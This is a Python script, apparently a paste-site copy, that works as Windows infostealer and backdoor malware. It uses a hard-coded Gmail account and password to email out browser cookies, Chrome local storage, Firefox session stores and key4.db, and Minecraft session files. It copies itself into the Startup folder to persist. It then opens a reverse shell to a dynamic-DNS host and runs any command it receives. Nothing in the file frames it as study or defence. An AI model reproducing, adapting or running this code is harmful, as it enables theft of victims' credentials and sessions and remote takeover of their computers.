import socketimport osimport subprocessimport shutilimport timeimport

1. import socket
2. import os
3. import subprocess
4. import shutil
5. import time
6. import getpass
7.  
8. from getpass import getuser
9. from smtplib import SMTP_SSL
10. from os import listdir
11. from os.path import getsize
12. from os.path import basename
13. from email.mime.text import MIMEText
14. from email.mime.base import MIMEBase
15. from email import encoders
16. from email.mime.image import MIMEImage
17. from email.mime.multipart import MIMEMultipart
18.  
19. username="perf3ctodst@gmail.com"
20. password="F4nt4sy7sungs4Mpi312"
21.  
22. USER_NAME=getpass.getuser()
23. diruser=getuser()
24. # #AutoStartup Malwario
25. src = os.path.dirname(os.path.realpath(__file__))
26. src_files = os.listdir(src)
27.  
28. def snatcher(username,password,directory,body):
29. user=username
30. passwd=password
31. subject = 'BrowserSessionReport'
32. msg = MIMEMultipart()
33. msg['From'] = user
34. msg['To'] = user
35. msg['Subject'] = subject
36. msg.attach(MIMEText(body,'plain'))
37. for file in listdir(directory):
38. try:
39. attachment = open(directory+str(file),'rb')
40. print(str(file)+" is size:"+str(getsize(directory+str(file))))
41. part = MIMEBase('application','octet-stream')
42. part.set_payload((attachment).read())
43. encoders.encode_base64(part)
44. part.add_header('Content-Disposition',"attachment; filename= "+file)
45. msg.attach(part)
46. except PermissionError as e:
47. print(e)
48. text = msg.as_string()
49. try:
50. serv=SMTP_SSL('smtp.gmail.com',465)
51. serv.ehlo()
52. serv.login(user,passwd)
53. serv.sendmail(user,user,msg.as_string())
54. print("Sent!")
55. except:
56. print("Something went wrong")
57.  
58. def snatcherFile(username,password,directory,body):
59. user=username
60. passwd=password
61. subject = 'BrowserSessionHijackReport'
62. msg = MIMEMultipart()
63. msg['From'] = user
64. msg['To'] = user
65. msg['Subject'] = subject
66. msg.attach(MIMEText(body,'plain'))
67. try:
68. attachment = open(directory,'rb')
69. filename=basename(directory)
70. part = MIMEBase('application','octet-stream')
71. part.set_payload((attachment).read())
72. encoders.encode_base64(part)
73. part.add_header('Content-Disposition',"attachment; filename= "+filename)
74. msg.attach(part)
75. except PermissionError as e:
76. print(e)
77. text = msg.as_string()
78. try:
79. serv=SMTP_SSL('smtp.gmail.com',465)
80. serv.ehlo()
81. serv.login(user,passwd)
82. serv.sendmail(user,user,msg.as_string())
83. print("Sent!")
84. except:
85. print("Something went wrong")
86.  
87. def add_to_startup(file_path=""):
88. bat_path = r"C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" % USER_NAME
89. x=0
90. for filename in src_files:
91. if os.path.exists(os.path.join(str(src),str(filename))):
92. try:
93. full_file_name = os.path.join(str(src),str(filename))
94. copy_path=r"C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" % USER_NAME
95. try:
96. shutil.copy(full_file_name,copy_path)
97. except:
98. try:
99. shutil.copytree(full_file_name,copy_path+"\\"+str(filename))
100. x+=1
101. except:
102. break
103. except:
104. pass
105. try:
106. snatcher(username,password,("C:/Users/"+str(diruser)+"/AppData/Roaming/.minecraft/"),"Minecraft launcher session")
107. except:
108. pass
109. try:
110. snatcher(username,password,"C:/Users/"+str(diruser)+"/AppData/Local/Google/Chrome/User Data/Default/Local Storage/leveldb/","Chrome local app storage")
111. snatcherFile(username,password,"C:/Users/"+str(diruser)+"/AppData/Local/Google/Chrome/User Data/Default/Cookies","Chrome cookies")
112. except:
113. pass
114. try:
115. #I choose not to
116. extra=os.listdir("C:/Users/"+str(diruser)+"/AppData/Roaming/Mozilla/Firefox/Profiles/")
117. snatcherFile(username,password,"C:/Users/"+str(diruser)+"/AppData/Roaming/Mozilla/Firefox/Profiles/"+str(extra[0])+"/webappsstore.sqlite","Firefox local app storage")
118. snatcherFile(username,password,"C:/Users/"+str(diruser)+"/AppData/Roaming/Mozilla/Firefox/Profiles/"+str(extra[0])+"/storage.sqlite","Firefox storage")
119. snatcherFile(username,password,"C:/Users/"+str(diruser)+"/AppData/Roaming/Mozilla/Firefox/Profiles/"+str(extra[0])+"/cookies.sqlite","Firefox cookies")
120. snatcherFile(username,password,"C:/Users/"+str(diruser)+"/AppData/Roaming/Mozilla/Firefox/Profiles/"+str(extra[0])+"/sessionstore.jsonlz4","Firefox sess storage")
121. snatcherFile(username,password,"C:/Users/"+str(diruser)+"/AppData/Roaming/Mozilla/Firefox/Profiles/"+str(extra[0])+"/key4.db","Firefox keys storage")
122. except:
123. pass
124. #Only works on windows boxes so far. need one for other chrome pieces of garbage.
125. try:
126. add_to_startup()
127. except:
128. pass
129. #Create socket
130. #add_to_startup()
131. s=socket.socket()
132. host=socket.gethostbyname("bastardo219.ddns.net")
133. port=9365
134.  
135. while True:
136. try:
137. s.connect((host,port))
138. except TimeoutError:
139. continue
140. while True:
141. try:
142. data=s.recv(1024)
143. if data[:2].decode('utf-8')=="cd":
144. os.chdir(data[3:].decode('utf-8'))
145. if data[:3].decode('utf-8')=="kys":
146. try:
147. deletion="C:/Users/%s/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/client.exe" % USER_NAME
148. os.remove(deletion)
149. except Exception as e:
150. s.send(str.encode(output_string+str(os.getcwd())+str(e)))
151. s.close()
152. quit()
153.  
154. if len(data) > 0:
155. cmd = subprocess.Popen(data[:].decode('utf-8'), shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE, stdin=subprocess.PIPE)
156. output_bytes=cmd.stdout.read() + cmd.stderr.read()
157. output_string=str(output_bytes,'utf-8')
158. s.send(str.encode(output_string+str(os.getcwd())+"> "))
159. except:
160. try:
161. s.send(str.encode("Something bad happened!"))
162. time.sleep(30)
163. except:
164. try:
165. s=socket.socket()
166. host=socket.gethostbyname("bastardo219.ddns.net")
167. s.connect((host,port))
168. except TimeoutError:
169. pass
170.  
171. #Close connection
172. s.close()